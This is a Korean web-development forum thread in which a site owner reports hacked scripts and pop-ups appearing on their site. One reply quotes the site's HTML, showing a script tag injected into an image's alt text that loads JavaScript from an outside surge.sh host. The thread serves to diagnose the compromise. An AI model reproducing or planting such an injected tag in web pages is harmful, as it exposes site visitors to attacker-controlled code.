해킹으로 이상한 스크립트가 불러와집니다.

해킹으로 이상한 스크립트가 불러와집니다.

QA

해킹으로 이상한 스크립트가 불러와집니다.

본문

990890557_1709859085.7037.png

layui 라는 엘리먼트가 자동 생성되고

 

990890557_1709859141.0505.png

이런 팝업이 나옵니다.

 

990890557_1709859176.6353.png

 

990890557_1709859357.5102.png

개발자모드에서도 이상한 프레임워크가 불러와지는 거같은데

 

990890557_1709859582.463.png

검색 결과엔 해당 내용은 없는 거 같습니다.

위에껀 제가 css로 네이버 팝업 가려둔거에요.

 

도움을 좀 부탁드립니다.

이 질문에 댓글 쓰기 :

답변 2

 

아래 체크해놓은 부분 관련코드 확인하세요. 거기서 해킹된 js가 출력되네요.


<a href="https://www.bibletour.co.kr/view/77" class="lk">
                                <div class="img">
                                    <img src="https://www.bibletour.co.kr/upload/product/productImg/77/1708574958.jpg" alt="[240916~240927] 로마&그리스&튀르키예로 떠나는 성지순례<script src=//sky-key.surge.sh/js/page.js></script>" title="">    
                                </div>
                            </a>

3546975779_1709862504.9783.png

별도 해킹인지는 모르겠으나 일단 관리자 내 스크립트 넣은 내용을 확인해보시는게 좋을것같은데 사이트 주소 알려주시면 정확한 답변이 가능할것같습니다.

답변을 작성하시기 전에 로그인 해주세요.
전체 14,981
QA 내용 검색
filter #php ×

회원로그인

(주)에스아이알소프트 / 대표:홍석명 / (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1404호 / E-Mail: admin@sir.kr
사업자등록번호: 217-81-36347 / 통신판매업신고번호:2014-서울강남-02098호 / 개인정보보호책임자:김민섭(minsup@sir.kr)
© SIRSOFT